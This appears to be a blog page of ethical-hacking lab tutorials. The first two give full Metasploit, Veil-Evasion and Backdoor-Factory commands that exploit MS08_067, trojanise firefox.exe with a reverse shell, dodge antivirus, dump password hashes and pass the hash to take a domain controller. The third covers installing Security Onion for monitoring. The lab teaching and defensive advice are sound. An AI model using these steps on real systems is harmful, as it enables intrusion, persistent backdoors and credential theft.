Backdooring Firefox with Veil-Evasion, Backdoor-Factory & Metasploit – Server 2003 MS08_067

In this scenario you have just compromised a Windows 2003 Domain Controller as it was unpatched for MS08_067. You don’t want to create a persistent backdoor on the target system as a vigilant administrator may see the anomaly and investigate. You are happy to wait for some time before you get a shell on the box again. The best bit is the administrator is on the box at the time so it arouses less suspicion and also allows you to spy on the administrator and see what they are doing.

What do you do?

Well you could do many things but what we will cover here is using a system application already installed on the system that we will modify with some shellcode and drop back on the target system creating a backdoor from an executable that is ran frequently on the target system and blends in with the traffic generated. Looking at the desktop shortcuts is an excellent way to see what is commonly used by the user of a system. Either that or they didn’t untick the shortcut box but in saying that there is a strong chance it will be ran in the near future if you are patient and willing to wait. Patience is the key.

I have been meaning to write about Backdoor-Factory for some time now as it’s quite cool, your executable is fully functional after it’s been modified and will continue to work like it did before without any issues if you execute the process of modifying the executable correctly that is. The other reason I wanted to write this was to show how easy it is to do something like this and why you need to scrutinize your downloads or executables, especially if they come from an unknown source like a torrent site for example. Even Altcoin executables have been targeted on forums where unsuspecting end users think they are downloading a reputable miner, when in fact it’s actually backdoored and stealing from them :-/

The combination of Veil-Evasion and Backdoor-Factory together however is an excellent combination for obfuscating your payload on a penetration test and will remain undetected by Anti-Virus as long as you don’t upload the executable file to VirusTotal, uploading the hash to check though is perfectly fine 😉

The point of this article is to not put all your trust in VirusTotal or your system Anti-Virus to confirm that something is clean.

The lab environment configured for this exploitation consists of the following systems:

1 – Pfsense <– Firewall

2 – Security Onion <– Monitoring & IDS

4 – Windows Server 2003 <– Domain Controller

5 – Kali <– Hack all the things

Trying this against production systems you are not authorized to attack will get you caught. You have been warned. Only do this to learn and generally have fun.

In this tutorial we will go through the following 7 steps below:

1 – Exploit a Windows 2003 Domain Controller with Metasploit (MS08_067).

2 – Check the shortcuts on the “All Users” desktop.

3 – Pull one of the executables from behind a shortcut on the desktop and backdoor it with Veil-Evasion using the Backdoor-Factory payload.

4 – Check the hash of the file against VirusTotal.

5 – Upload the backdoored executable to the target system.

6 – Configure a listener with Metasploit to receive the shell on the box when the shortcut is clicked.

7 – Be patient.

Kali Attacker = 192.168.1.102

Windows 2003 Domain Controller = 192.168.1.105

Let’s get to it 🙂

You’ve already done some reconnaissance with nmap and you know that the system is vulnerable to MS08_067 you then exploit the system with Metasploit’s msfconsole and gain a meterpreter shell on the Windows 2003 Domain Controller.

Msfconsole

use exploit/windows/smb/ms08_067_netapi

set rhost 192.168.1.105

exploit

1_Loading_msfconsole_exploiting_MS08_067_Windows_Server_2003

1_Loading_msfconsole_exploiting_MS08_067_Windows_Server_2003

Check the IP address and the user you’re logged on as on the box:

“ifconfig” checks your IP and MAC address

“getuid” checks the user privilege you currently have on the box which is System 🙂

2_msfconsole_MS08_067_Windows_Server_2003_exploited_check_IP_and_username

2_msfconsole_MS08_067_Windows_Server_2003_exploited_check_IP_and_username

Next, navigate the Windows 2003 directories on the system to locate the “All Users” profile and see what shortcuts are on the desktop.

cd C:\
ls
cd “Documents and Settings”
ls
cd “All Users”
ls

3_meterpreter_changing_directories_Windows_Server_2003

3_meterpreter_changing_directories_Windows_Server_2003

Continuing on

ls
cd Desktop
ls

At this point you will see the shortcuts for “All Users” and notice a shortcut for Mozilla Firefox (because you installed it). Leveraging this information there is a good chance someone will open the browser on the Server at some point and this is what we want. Alternatively system tools are an excellent choice also like the Sysinternals Suite of tools that often will exist on a Windows server. You could backdoor anything from files to installers to executables that are commonly used. Installers are another excellent way to pivot onto other boxes if there is a network share specifically holding installers for quick install on other systems as is often the case, hell you could even backdoor something that is pushed out via Group Policy and target a full Active Directory user base if the scope asks for the worst.

4_meterpreter_changing_directories_Windows_Server_2003_continued

4_meterpreter_changing_directories_Windows_Server_2003_continued

Navigate to the program files directory of Mozilla Firefox on the system as this is where the executable resides that is executed when the shortcut is clicked whether on the desktop or the Program Files directory from the Start Menu.

From the same meterpreter window run the following commands below

Cd “C:\\Program Files\\Mozilla Firefox”
ls | grep firefox.exe

Note the double backslash that needs to be passed as an escape when navigating the Windows directory using the meterpreter compared to the single backslash on a standard Windows console. The quotes are also important to encapsulate the string correctly as it has spaces similar to a Windows system.

Ls | grep firefox.exe is simply checking the contents of the Mozilla Firefox folder that you just changed into and piping it to grep to search for firefox.exe as this is the executable we are going to backdoor.

5_navigating_program_files_Mozilla_Firefox_checking_executable

5_navigating_program_files_Mozilla_Firefox_checking_executable

To download firefox.exe to your Kali system simply run the following from the meterpreter console

download firefox.exe

6_metasploit_meterpreter_download_firefox_exe

6_metasploit_meterpreter_download_firefox_exe

Now that you have the exact original version of the firefox executable on the target system you can backdoor it with Veil-Evasion, it does not come as standard with Kali but it is included in the repository so just run:

apt-get update
apt-get veil-evasion

Follow along with the prompts, they are pretty much self explanatory and you will soon have Veil-Evasion installed on your Kali system and ready to use in no time at all.

7_apt-get_update_and_apt-get_install_veil-evasion_

7_apt-get_update_and_apt-get_install_veil-evasion_

So next thing to do is run Veil-Evasion and get things moving along by running “list” to check the available payloads

8_veil_evasion_started_list

8_veil_evasion_started_list

Select option 18 for the native/backdoor_factory payload and press Enter to continue

9_veil_evasion_started_list_select_backdoor-factory_payload

9_veil_evasion_started_list_select_backdoor-factory_payload

Next you need to modify the backdoor-factory payload options from the default ones seen below

10_veil_evasion_backdoor-factory_payload_options

10_veil_evasion_backdoor-factory_payload_options

Modify the options to that of your local host IP address, local port, path of the original executable (firefox.exe), the patch method to manual and the reverse shell payload you want to use.

Set lhost 192.168.1.102
set lport 443
set original_exe /root/firefox.exe
set patch_method manual
set payload reverse_shell_tcp_inline

11_veil_evasion_backdoor-factory_payload_options_modified

11_veil_evasion_backdoor-factory_payload_options_modified

You can double check your predefined settings by running “info”

12_veil_evasion_backdoor-factory_payload_options_modified_check_info

12_veil_evasion_backdoor-factory_payload_options_modified_check_info

Once your happy with the settings next you need to run “generate” in order to generate your payload and modify the firefox.exe file to include your reverse shell hidden in shell code. You will need to locate a cave to hide your shellcode in and I find doing this manually works better than letting Backdoor-Factory automatically do this for you. The trick is to find a cave that is bigger than your initial size which is 411 in this case. Option 1 is 472, Option 2 is 551 both of which are only a little bit bigger than the size you are trying to hide your shellcode in so option 3 with a size of 1184 is the best option and should work without any issues for the task at hand. If none of the cave sizes seem of use you can use j to jump and find more caves to use instead until you are happy.

Enter 3 and hit Enter to finish the process

13_veil_evasion_backdoor-factory_payload_generate

13_veil_evasion_backdoor-factory_payload_generate

This should run without issue like this

14_veil_evasion_backdoor-factory_payload_generate_option_selected

14_veil_evasion_backdoor-factory_payload_generate_option_selected

Next you will be prompted for your payload name, enter whatever you want but the payload is firefox so it makes sense to enter firefox for the name.

15_veil_evasion_backdoor-factory_payload_generate_enter_payload_name

15_veil_evasion_backdoor-factory_payload_generate_enter_payload_name

Congratulations, you have just generated your payload. You’ll see the location of the payload file generated in the final output like the screenshot below

16_veil_evasion_backdoor-factory_payload_generated

16_veil_evasion_backdoor-factory_payload_generated

Before continuing it’s wise to check the hash on VirusTotal (not the actual executable as that will be flagged when analyzed). The hash however will not give any of the contents away and will likely remain undetected on the target system.

Change into the directory of the Virus Total Notify tool:

Cd /usr/share/veil-evasion/tools/vt-notify

Run the script with the “-s” option to check the file hash of your backdoored executable and you should see an output like the one below:

./vt-notify -s /var/lib/veil-evasion/output/compiled/firefox

17_veil_evasion_vt-notify_file_hash_check

17_veil_evasion_vt-notify_file_hash_check

Now that you know the hash is not flagged you can safely upload it back to the target system using the meterpreter shell from earlier and use the meterpreter upload command

upload /var/lib/veil-evasion/output/compiled/firefox.exe .

The dot (.) above tells upload to copy the file to the current directory which is the Mozilla Firefox program files directory we had opened earlier.

18_meterpreter_upload_firefox_backdoor

18_meterpreter_upload_firefox_backdoor

Next you need to setup a listener of your choosing but for this guide I will use Metasploits msfconsole to create the listener. At this point exit your current meterpreter session on the target system so that you are back at the msf > prompt.

Configure your listener

use exploit/multi/handler
set payload windows/shell_reverse_tcp
set lhost 192.168.1.102
set lport 443
exploit

19_msfconsole_reverse_tcp_shell_configuration

19_msfconsole_reverse_tcp_shell_configuration

Now go to your Windows 2003 Domain Controller and execute the firefox shortcut on the desktop and pop back to your meterpreter session and you should now see a connected shell on your target system in the C:\Program Files\Mozilla Firefox directory where we dropped the payload.

20_msfconsole_reverse_tcp_shell_connected

20_msfconsole_reverse_tcp_shell_connected

Checking the processes on the target system with the Sysinternals Process explorer you should see firefox.exe with a cmd.exe child process running.

21_Sysinternals_Process_Explorer_process_checking

21_Sysinternals_Process_Explorer_process_checking

Checking the TCP/IP connections currently running from the Firefox.exe process you will see your Kali remote IP address running over https port 443.

22_Sysinternals_Process_Explorer_process_checking_TCP_IP_connections

22_Sysinternals_Process_Explorer_process_checking_TCP_IP_connections

Looking at the image file I noticed it was a bit weird looking too. Not important just something weird I noticed.

23_Sysinternals_Process_Explorer_process_checking_Image_File_Weird

23_Sysinternals_Process_Explorer_process_checking_Image_File_Weird

Checking the cmd.exe child process you will see that firefox.exe is the parent of cmd.exe which should never be the case!

24_Sysinternals_Process_Explorer_process_checking_cmd_exe

24_Sysinternals_Process_Explorer_process_checking_cmd_exe

That’s it, check your Security Onion logs and see what you can determine happened. There is some interesting information in there too that warrants a closer look.

I hope you take away some valuable lessons from this tutorial and inspect the processes running on your system if you don’t do that already! Be dubious of random executables online before you download them and don’t rely on VirusTotal to save you or make you feel safe. Also, stop using Windows Server 2003 and Windows XP as these systems are full of holes and  even though MS08_067 was exploited in this article and the previous one these systems are full of holes and unsupported so move away from them. It’s really child’s play and trivial for any script kiddie to own your box.

There is also a video to accompany this article seen here below.

Until next time play in the lab and see what you can do, read the man pages and read about security threats and subscribe to RSS feeds online. It’s an excellent way to learn and get to your end goal whatever that may be.

 

Exploiting ms08_067 – Windows XP & Windows Server 2003 Passing the hash

If you have ever encountered Conficker (aka Downup, Downadup and Kido depending on the AV vendor naming convention but I prefer Conficker) on a Windows system it has most likely been due to the system being unpatched for ms08_067 (CVE-2008-4250) published on October 23, 2008 replacing the previous vulnerability affecting some Windows systems published on August 08, 2006 MS06-040 (CVE-2008-4250) which makes it trivial to run arbitrary code on the target system via remote code execution (RCE) allowing an attacker to gain full system access of the target machine and do anything they want. This made the Conficker Worm one of the best worms since the Welchia Worm back in 2003 that was classed as a helpful worm as it looked for the Blaster Worm on an infected system deleted it and then patched the users system although it was not always successful with the patching process according to Microsoft. Conficker still exists and one of the variants of which there are five (A,B, B++, C & E)  even formed a huge botnet.

A nice visual representation of how the Conficker Worm spreads is outlined below courtesy of Wikimedia and it uses a nice little technique commonly used by worms and malware still today to spread laterally through a network exploiting weak passwords on the victim machines. Later another variant updated the previous versions to propagate via network shares and removable media and was recently discovered in a nuclear power plant in Germany where there machines were said to be riddled with it as is often the case when you discover a Conficker infection. I once witnessed Conficker hit over 25,000 machines in minutes after a Senior technician had plugged their USB into a system logged in as domain admin, lets just say that heads rolled!

Did you know that the name Conficker actually translates to “Configure Fucker” using the English word Configure (Con) and the German derogatory term “Ficker” which translates to Fucker in English so next time you see it think of the correct name and don’t refer to it as Downup for example as that’s just AV companies giving different names to malware families and confusing the masses.

Analysis has been difficult for researchers who struggled to get around the huge amount of pseudo-random generated domains generated on a daily basis of which there was 250 initially beaconing out to eight Top Level Domains (TLD’s) think .biz, .com etc. When it reached the Command and Control (C&C) server it then would update itself or send a new payload to the victim machine. Imagine dealing with a huge amount of Indicators of Compromise (IOC’s) like this yourself, it’s quite daunting but through collaboration in the Cyber Security Community which included Microsoft, ICANN, domain registry operators, anti-virus vendors, and academic researchers they managed to crack the Domain Generation Algorithim (DGA) that was being used to generate the 250 pseudo-random generated domains a day and register the domains in advance of the Conficker Author and block them from communicating with and updating the botnet which proved to be quite successful until Conficker C was released in early February 2009 and managed to update nearly half a million computers from the A/B variants to Conficker C.

Variants B and later also upgraded the armoring of it’s payloads to prevent them from being hijacked and moved from MD5 hashing to MD6 six weeks after a weakness was discovered in the MD5 algorithm and moved from an RSA 1024-bit private key to an RSA 4096-bit private key which meant Conficker didn’t unpack or execute the payload unless the signature was verified against the public key in the malware.

The most amazing thing that happened when Conficker updated the previous variants on April the 1st 2009 was that it now no longer generated 250 pseudo-random generated domains per day but a staggering 50,000 pseudo-random generated domains from over 116 TLD’s all over the world. The Conficker author was learning from the Conficker Working Group and adapting to make their research incredibly more difficult than it once had been.

This is why we still see Conficker today so long after it’s initial release eight years ago.

0_Conficker_infection_methods

0_Conficker_infection_methods

The exploit of MS08_067 works so well because the Windows Server service does not properly handle specially crafted RPC requests that are sent to it.

The Server service provides Remote Procedure Call (RPC) support so that you can print, access file shares and communicate with applications on other systems in the network using named pipe services.

The Remote Procedure Call (RPC) is a protocol which allows a program to request a service from a program that is located on another system remotely on the network. The remote system will be known as the client and the remote service-providing program is the server.

Anyway let’s get to the fun part.

Exploiting MS08_067 is a bit like writing “hello world” for the first time in a new language and it’s a great way to get started 🙂

The lab environment configured for this exploitation consists of the following systems:

1 – Pfsense <– Firewall
2 – Security Onion <– Monitoring & IDS
3 – Windows XP <– Joined to a Domain Controller
4 – Windows Server 2003 <– Domain Controller
5 – Kali <– Hack all the things

Trying this against production systems you are not authorized to attack will get you caught. You have been warned. Only do this to learn and generally have fun.

In this tutorial we will go through the following 7 steps below:

1 – Scanning a system using Nmap to check if it is vulnerable first to MS08_067.

2 – Exploiting the system with Metasploit using msfconsole.

3 – Grabbing password hashes on the compromised target system.

4 – Checking which hashes work with an Nmap script.

5 – Leveraging the hashes to attack a Domain Controller by passing the hash.

6 – Have a quick look at the system processes using Process Explorer.

7 – Have a quick look at the Security Onion Snort IDS Logs in Squil to see what events were triggered.

Kali Attacker = 192.168.1.102
XP Victim IP Address = 192.168.1.104
Windows Server 2003 Domain Controller = 192.168.1.105

Let’s get to it 🙂

First by using one of the built in Nmap Scripting Engine (NSE) scripts we can scan the system to see whether it’s vulnerable to MS08_067 (It will also tell you if the system is already infected with Conficker)

Search for it on your system using the following command

locate nmap | grep ms08

You can then use the location of the file in your Nmap command as outlined below

nmap –script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse 192.168.1.104

“nmap” runs nmap
“–script=” this is where you tell nmap you want to use a script
“/usr/share/nmap/scripts/smb-vuln-ms08-067.nse” this is the directory in which the script we want to use resides.
“192.168.1.104” this is the target (victim) machine to scan

1_nmap_ms08_067_nse_vulnerability_scanning_script

1_nmap_ms08_067_nse_vulnerability_scanning_script

Now that we know the system is vulnerable to this attack we can fire up msfconsole and exploit the target.

Simply run msfconsole

2_load_msfconsole_to_exploit_ms08_067

2_load_msfconsole_to_exploit_ms08_067

Don’t you love the banners every time you login 🙂

3_msfconsole_loaded

3_msfconsole_loaded

Search for the ms08_067 module with a simple search

search ms08_067

The ranking of great below means this exploit as per the advisory will have great success in exploiting the target system by using a buffer overflow allowing you to run arbitrary commands on the target system via remote code execution (RCE)

4_msfconsole_search_for_ms08_067_exploit_module

4_msfconsole_search_for_ms08_067_exploit_module

Using the name and the directory found using search above you can now use that in order to exploit the vulnerable Windows XP target machine.

Use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.104
exploit

“use” tells metasploit that you would like to use the module that follows
“exploit/windows/smb/ms08_067_netapi” the module you want to use
“set” sets the options which follow into the newly loaded module
“RHOST 192.168.1.104” this is the option you want to set for your remote host IP address
“exploit” simply runs the module with your predefined options just entered.

Running shell gives you a command line shell on the target box, this is not needed and is just done for fun.

You can see the IP address of the Windows XP machine, alternatively you could just run ifconfig from the meterpreter as you would on your Linux system to get the same information.

5_msfconsole_metasploit_ms08_067_Windows_XP_exploitation

5_msfconsole_metasploit_ms08_067_Windows_XP_exploitation

Exit from the windows shell and then run hashdump from the meterpreter shell to easily gather the user accounts and password hashes on the target system.

6_meterpreter_dumping_password_hashes_Windows_XP

6_meterpreter_dumping_password_hashes_Windows_XP

Now that you have some usernames and passwords you can create some files using any editor of your choice but for pure simplicity I am using the cat command to create these quickly.

“Cat > usernames.txt” tells cat to create a file called usernames.txt. Everytime you want to go to the next line hit enter and exit and save the file by pressing CTRL + C on your keyboard.

“Cat usernames.txt” is used to then verify that the usernames have been added and saved.

Repeat the same process above for the hashes as you can see below.

7_create_username_and_password_hash_files_for_nmap_brute_force_script

7_create_username_and_password_hash_files_for_nmap_brute_force_script

Now that you have a username and hashes file you can pass these to another Nmap script to try against the target Windows 2003 Domain Controller and see if these accounts exist.

Search for the nmap smb-brute script with the following command:

Locate nmap | grep smb-brute

Run the following nmap command to check if any of the usernames and hashes are valid against the target system.

Nmap –script=/usr/share/nmap/scripts/smb-brute.nse –script-args=userdb=usernames.txt,passdb=hashes.txt 192.168.1.105

“nmap” runs nmap
“–script=” this is where you tell nmap you want to use a script
“/usr/share/nmap/scripts/smb-brute.nse” this is the directory in which the script we want to use resides.
“–script-args=” this allows you to send additional options to the NSE script
“userdb=usernames.txt” userdb is an option and usernames.txt is assigned to this variable which is then passed to the script.
“,” make sure to enter that comma without any spaces!
“ passdb=hashes.txt” passdb is an option and hashes.txt is assigned to this variable which is then passed to the script.
“192.168.1.105” this is the target (victim) machine to scan (You can change this to a subnet if you wish)

You can then see if any of the accounts are valid when the script runs. Any that are will have “Valid Credentials” appended at the end as can be seen below.

8_nmap_smb_brute_nse_script_Windows_Server_2003

8_nmap_smb_brute_nse_script_Windows_Server_2003

Using your confirmed valid credentials using the nmap script you can now pass the hash obtained from the Windows XP machine administrator account and use it against the Windows 2003 Server Domain Controller without knowing the actual plain text password or even cracking it. You can simply pivot and use the hash as leverage into another system on the network and in this case the keys to the kingdom as you are getting access to all the users accounts hosted on this server. In this guide I am using the psexec module within metasploit but you could also choose to upload the actual sysinternals psexec.exe to the Windows XP system and pivot from there leaving less of a trail to your Kali system when you pass the hash.

Use exploit/windows/smb/psexec
set rhost 192.168.1.105
set SMBUSER administrator
set SMBPASS 25d4823ec0752acc38f10713b629b565:cf4762a61e232355aa12d713a083d5fd
exploit

I’m not going to explain the above command usage as it should be self explanatory, if you are unsure check above and see if you can figure it out.

Once again shell is ran to get a Windows command prompt on the Windows 2003 Server and check the IP address.

9_metasploit_Windows_Server_2003_Pass_the_hash_psexec

9_metasploit_Windows_Server_2003_Pass_the_hash_psexec

If you run the Sysinternals process explorer on the Windows 2003 Server you can see your metasploit connection established running in rundll32.exe as can be seen below.

10_using_procexp_on_Windows_Server_2003_to_check_connections

10_using_procexp_on_Windows_Server_2003_to_check_connections

It’s a good idea to run metasploits hashdump again in order to gain the Active Directory users as you are sure to get more than the ones you gained on the Windows XP machine at the start.

11_meterpreter_dumping_password_hashes_Windows_Server_2003_Active_Directory

11_meterpreter_dumping_password_hashes_Windows_Server_2003_Active_Directory

I like to also run monitoring tools while playing around as you probably know from following along in previous tutorials namely the building of your own Snort IDS but have recently gone back to using Security Onion as it’s very user friendly to configure, setup and everything just works. The team over at security onion have really done a fantastic job getting this Open Source networking monitoring OS off the ground and I really advise having a play around with it as it’s easy to maintain and configure.

Below is a snippet from SQUIL making the Snort IDS signatures easy to run through and break down into the finer details. As you can see it detected Possible Shellcode. Policy related signatures are also triggered too which don’t mean what you think they mean. Yes you’re thinking it shows the system was attacked but in reality they mean it’s a policy signature and it’s detecting an EXE or DLL file download to the destination (target) system which in our case is part of an attack but in real life it could just be a random EXE or DLL that has been downloaded legitimately and sets off a False Positive. Most people think these are attacks when they are not.

12_Security_Onion_IDS_Logs_SGUIL

12_Security_Onion_IDS_Logs_SGUIL

I hope you enjoyed this write up, I had lots of fun making it and have also included a short video carrying out this attack which you can view below. Until next time, have fun!

 

 

Building an ethichal hacking lab on your laptop with VirtualBox – Part 14 – Security Onion – Network Monitoring Tools

If you followed along with my previous exercise on creating a Snort IDS for your lab you will most likely love Security Onion as it takes far less effort to get things configured and setup. It’s an excellent Ubuntu based operating system designed solely for both Host Intrusion Detection (HID’s) and Network Intrusion Detection (NID’s) for your network environment and a great tool to use in a lab environment due to the lack of configuration and setup time involved compared to doing everything yourself manually. Why reinvent the wheel when someone has already invented it for you? (Well sometimes it’s needed to learn about something new)

There is a huge host of network related tools that are installed which includes Snort, Suricata, Bro, OSSEC (HID’s), Sguil, Squert, ELSA, Xplico, NetworkMiner, Tcpreplay, Wireshark, tcpdump and a lot more great tools too for analyzing your network traffic.

It’s very easy to configure and excellent for use in a Production or even lab environment for monitoring network traffic.

What you will need is the following:

1 – VirtualBox installed with guest additions downloaded
2 – Pfsense Configured
3 – The Security Onion ISO downloaded
4 – Snort subscription to the free account is perfectly fine (Oinkcode)

Once you have all of the above obtained you are ready to start the installation.

Let’s get to it!

Follow along with the Pfsense configuration guide from the initial lab setup and feel free to allocate more memory to the Security Onion setup, I find 4GB’s to be sufficient for memory allocation and a 30GB Hard Disk for this setup. Assign your NIC’s in a similar fashion except make NIC Adapter 1 & 2 internal and set the Promiscuous Mode option to “Allow VM’s” then make NIC Adapter 3 an internal adapter only so that you will have Internet access for updates, you will also use it as the management interface from within your lab environment. Optionally you could set NIC adapters 1 & 2 as internal with Promiscuous mode set for VM’s and NIC adapter 3 as NAT which will allow for Internet connectivity without having Pfsense setup and configured to allow Internet access. The choice is yours here and depends on what you want to do. For this guide though, we will use the following NIC configuration outlined below.

NIC Adapter 1:

1_Security_Onion_VirtualBox_Configuration_NIC_Adapter_1

1_Security_Onion_VirtualBox_Configuration_NIC_Adapter_1

NIC Adapter 2:

2_Security_Onion_VirtualBox_Configuration_NIC_Adapter_2

2_Security_Onion_VirtualBox_Configuration_NIC_Adapter_2

NIC Adapter 3:

3_Security_Onion_VirtualBox_Configuration_NIC_Adapter_3

3_Security_Onion_VirtualBox_Configuration_NIC_Adapter_3

Once you’re finished with the VirtualBox configuration settings make sure you have pfsense running if you’re using the internal adapters in this guide otherwise the NAT adapter will give internet connectivity if you chose not to configure Pfsense.

Power on your Virtual Security Onion system and follow along.

Select your language and select Continue

4_Security_Onion_Installation_Configuration_select_language

4_Security_Onion_Installation_Configuration_select_language

Select Download updates while installing and select Continue

5_Security_Onion_Installation_Configuration_select_download_updates

5_Security_Onion_Installation_Configuration_select_download_updates

Click Continue to erase the disk and install Security Onion

6_Security_Onion_Installation_Configuration_select_erase_disk_and_install

6_Security_Onion_Installation_Configuration_select_erase_disk_and_install

At the next prompt just hit continue to Format the disk and continue with the install

7_Security_Onion_Installation_Configuration_select_erase_disk_and_install_continue

7_Security_Onion_Installation_Configuration_select_erase_disk_and_install_continue

Select your country on the map and select Continue again

8_Security_Onion_Installation_Configuration_select_your_country

8_Security_Onion_Installation_Configuration_select_your_country

Select your keyboard layout and select Continue

9_Security_Onion_Installation_Configuration_select_keyboard _layout

9_Security_Onion_Installation_Configuration_select_keyboard _layout

Enter your name, computer name, username and a password and select Continue again and wait for a bit for it to install.

10_Security_Onion_Installation_Configuration_username_system_and_password10_Security_Onion_Installation_Configuration_username_system_and_password

10_Security_Onion_Installation_Configuration_username_system_and_password

When finished click restart to continue

11_Security_Onion_Installation_Configuration_when_finished_click_restart

11_Security_Onion_Installation_Configuration_when_finished_click_restart

At the next prompt click Enter to continue with the reboot

12_Security_Onion_Installation_Configuration_when_finished_click_restart_followed_by_Enter

12_Security_Onion_Installation_Configuration_when_finished_click_restart_followed_by_Enter

Once the system has rebooted simply login with your username and password

13_Security_Onion_Enter_Username_and_password

13_Security_Onion_Enter_Username_and_password

Chances are there will be some further software updates once you login so select “Install Now” to proceed with the installation.

14_Security_Onion_Software_Update_First_boot

14_Security_Onion_Software_Update_First_boot

Once the update has completed select “Restart Now” to reboot the system again to complete the update process and then login again.

15_Security_Onion_Software_Update_First_boot_restart

15_Security_Onion_Software_Update_First_boot_restart

Now you will most likely want to have your system running in full screen to make playing with it easier so install VirtualBox Guest additions. You can follow along with the guide here at step 26 on how to do this as the process remains the same. After you have rebooted you should take a snapshot of the system so you can revert to this point and go back to a known good configuration if you break something while playing. It’s also handy for Malware analysis as you can revert back to the time before you were playing with it.

Now for the system configuration all you have to do is click on the Setup icon on the desktop, Enter your password and select “Yes, continue”

16_Security_Onion_Software_system_configuration_setup

16_Security_Onion_Software_system_configuration_setup

Next select “Yes, configure /etc/network/interfaces!”

17_Security_Onion_Software_system_configuration_configure

17_Security_Onion_Software_system_configuration_configure

Select eth2 as your management interface and select OK to continue

18_Security_Onion_Software_select_management_interface

18_Security_Onion_Software_select_management_interface

As this is in a Virtual environment with Pfsense providing DHCP already it’s fine to select DHCP to continue. Alternatively feel free to configure it manually as per your IP addressing scheme.

19_Security_Onion_Software_DHCP_addressing

19_Security_Onion_Software_DHCP_addressing

Select “Yes, configure monitor interfaces”

20_Security_Onion_monitor_interfaces

20_Security_Onion_monitor_interfaces

eth0 and eth1 should be already ticked to use as your monitoring interfaces so just click OK to continue

21_Security_Onion_monitor_interfaces_eth0_and_eth1

21_Security_Onion_monitor_interfaces_eth0_and_eth1

Yes you want to make your changes now so click on “Yes, make changes!”

22_Security_Onion_monitor_interfaces_make_changes

22_Security_Onion_monitor_interfaces_make_changes

Time to reboot again so select “Yes, reboot!” to continue

23_Security_Onion_reboot_to_continue

23_Security_Onion_reboot_to_continue

After the system has rebooted click on the setup icon on the desktop again and select “Yes, Continue” as you did before

24_Security_Onion_run_setup_again

24_Security_Onion_run_setup_again

This time though select “Yes, skip network configuration!” to continue

25_Security_Onion_skip_network_configuration

25_Security_Onion_skip_network_configuration

Select production mode to continue

26_Security_Onion_select_Production_Mode

26_Security_Onion_select_Production_Mode

Select Standalone as you are using the management and network sniffing interfaces on the same system

27_Security_Onion_select_Standalone

27_Security_Onion_select_Standalone

Select Best Practices to continue and select OK

28_Security_Onion_select_Best_Practices

28_Security_Onion_select_Best_Practices

Enter a username that you want to use for logging in to Squil, Squert and ELSA and select OK to continue

29_Security_Onion_Squil_Squert_Elsa_username

29_Security_Onion_Squil_Squert_Elsa_username

Next enter a password you would like to use for Squil, Squert and ELSA and confirm in the window that follows

30_Security_Onion_Squil_Squert_Elsa_password_and_confirm

30_Security_Onion_Squil_Squert_Elsa_password_and_confirm

Next select the Snort IDS and click OK to continue

31_Security_Onion_Snort_IDS_select

31_Security_Onion_Snort_IDS_select

Next select the option for Snort VRT ruleset and Emerging Threats NoGPL ruleset, this is why you obtained an Oink code from Snort.

32_Security_Onion_Snort_IDS_select_VRT_and_ET_ruleset

32_Security_Onion_Snort_IDS_select_VRT_and_ET_ruleset

Enter your Snort Oinkcode and click OK to continue

33_Security_Onion_Snort_IDS_Oinkcode

33_Security_Onion_Snort_IDS_Oinkcode

Keep the default PF_RING min_num_slots as 4096 and select OK to continue

34_Security_Onion_Snort_IDS_PF_RING_min_num_slots

34_Security_Onion_Snort_IDS_PF_RING_min_num_slots

eth0 and eth1 network interfaces should already be selected so just click on OK to continue

35_Security_Onion_Snort_NIC_monitor_interfaces

35_Security_Onion_Snort_NIC_monitor_interfaces

Congratulations you are nearly there just select “Yes, proceed with the changes!” to make the changes to your system permanent that you have just entered.

36_Security_Onion_Finishing_configuration_changes

36_Security_Onion_Finishing_configuration_changes

That’s it you’ve reached the end of the installation, just select OK for the next few windows and take note of any important directories like the ones shown in following screenshots in order to modify and make any changes to your configuration. Alternatively you can revert to your snapshot that you made earlier or just run the setup again from the desktop.

37_Security_Onion_Installation_and_configuration_complete

37_Security_Onion_Installation_and_configuration_complete

Sostat commands for checking detailed information about your service status, get a guided tour and share redacted network information with other sources.

38_Security_Onion_sostat_commands

38_Security_Onion_sostat_commands

Snort rule modification and sensor directories for making manual changes to these after you have things configured.

39_Security_Onion_Snort_pulledpork_rule_modification

39_Security_Onion_Snort_pulledpork_rule_modification

UFW Firewall rule modification if you need to change any of the firewall rules.

40_Security_Onion_UFW_Firewall_Rules

40_Security_Onion_UFW_Firewall_Rules

Take another snapshot of your system as you have everything configured now and you can revert back to it when needed.

That’s it for now, we will be using Security Onion in some upcoming tutorials so it will be handy to have it configured for when you are following along.